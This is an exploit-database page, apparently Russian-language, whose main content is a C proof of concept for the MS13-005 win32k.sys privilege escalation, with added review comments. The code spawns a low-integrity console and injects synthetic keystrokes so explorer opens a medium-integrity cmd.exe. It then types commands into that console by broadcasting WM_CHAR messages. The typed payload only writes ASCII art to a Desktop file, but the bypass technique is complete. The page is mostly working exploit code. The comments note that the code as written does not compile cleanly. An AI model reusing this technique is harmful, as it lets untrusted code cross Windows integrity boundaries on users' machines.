MS13-005 (win32k.sys) exploit POC

Свойства

Дата публикации:
08.02.2013
Цель:
Microsoft Windows
Тип воздействия:
Повышение привилегий
Описание уязвимости:
Повышение привилегий в Microsoft Windows

Код

MS13-005 (win32k.sys)
The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application.
This security update is rated Important for all supported editions of Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
Windows 8, Windows Server 2012, and Windows RT. For more information, see the subsection, Affected and Non-Affected Software, in this section.



include <windows.h>
#include <stdio.h>
// Proof-of-concept accompanying the MS13-005 (win32k.sys) bulletin quoted above.
// Demonstrates driving a higher-integrity cmd.exe from a low-integrity process
// using nothing but synthesized keyboard input (keybd_event) and broadcast
// window messages (SendMessage with HWND_BROADCAST / WM_CHAR); no privileged
// API is called. Kept as a historical sample; review notes are inline.
//
// NOTE(review): the first include line above has lost its leading '#', and this
// body uses strlen() and EXIT_SUCCESS without including <string.h>/<stdlib.h>.
// Whether <windows.h> pulls those in depends on the toolchain; as written the
// translation unit is not self-contained.
int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    // Lines that will be "typed" into the target console, one entry per line,
    // NULL-terminated. Each is an `echo ... >> %USERPROFILE%\Desktop\TROLOLOL`,
    // so the only on-disk artifact of a successful run is that file on the
    // interactive user's Desktop (the ASCII art is purely demonstrative);
    // the trailing "exit" closes the driven console.
    // NOTE(review): these are string literals, so `const char *` is the honest
    // element type — PCHAR would allow a write through the pointer, which is UB.
    PCHAR payload[] = {
        "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "exit",
        NULL
    };
    // Step 1: spawn a child cmd.exe in its own console. The getchar() is an
    // operator pause only; nothing here synchronises with the child.
    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");
    getchar();
    si.cb = sizeof(si);
    // Handles are inherited (TRUE). Per the author's message the child runs at
    // the same (low) integrity level as this process.
    // NOTE(review): the BOOL result is discarded — on failure `pi` stays zeroed
    // and TerminateProcess below receives a NULL handle. pi.hProcess and
    // pi.hThread are never passed to CloseHandle(), so both leak for the
    // lifetime of this process.
    CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    );
    // Fixed delay instead of waiting on the child; timing-dependent by design.
    Sleep(1000);
    // Yeah, you can "bruteforce" the index of the window..
    // Step 2: synthesize the Win+Shift+7 chord — press Win, Shift and '7'
    // (0x37 is the virtual-key code for '7'), then release all three in the
    // same order. The second argument of each call is the hardware scan code.
    // The author states explorer.exe answers this chord by launching cmd.exe;
    // which taskbar item "7" maps to is environment-dependent, hence the
    // "bruteforce" remark above. From a monitoring standpoint this is
    // synthetic input injected into the interactive session.
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);
    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);
    Sleep(1000);
    // Step 3: the child from step 1 is no longer needed; kill it with exit
    // code 1337. The return value is not checked.
    printf("3] Killing now the useless low IL cmd.exe..\n");
    TerminateProcess(
        pi.hProcess,
        1337
    );

    // Step 4: feed the payload to the console opened in step 2 without ever
    // holding its window handle — every character is broadcast as a WM_CHAR
    // to all top-level windows. That broadcast is the whole trick and also
    // why the run is noisy: every top-level window that processes WM_CHAR
    // sees the text, not just the intended console.
    printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");
    printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");
    for(unsigned int i = 0; payload[i] != NULL; ++i)
    {
        // NOTE(review): strlen() is re-evaluated on every inner iteration;
        // the payload strings are constant, so hoisting it is a free cleanup.
        for(unsigned int j = 0; j < strlen(payload[i]); ++j)
        {
            // Yeah, that's the fun part to watch ;D
            // 10 ms pacing between characters. SendMessage is synchronous, so
            // any top-level window that stalls on WM_CHAR stalls this loop.
            Sleep(10);
            SendMessage(
                HWND_BROADCAST,
                WM_CHAR,
                payload[i][j],
                0
            );
        }
        // VK_RETURN (0x0D) sent as a WM_CHAR acts as the carriage return that
        // submits the line just typed.
        SendMessage(
            HWND_BROADCAST,
            WM_CHAR,
            VK_RETURN,
            0
        );
    }
    return EXIT_SUCCESS;
}

http://dualcoremusic.com/nerdcore/music/
Tags: exploit, poc, win32k.sys, windows


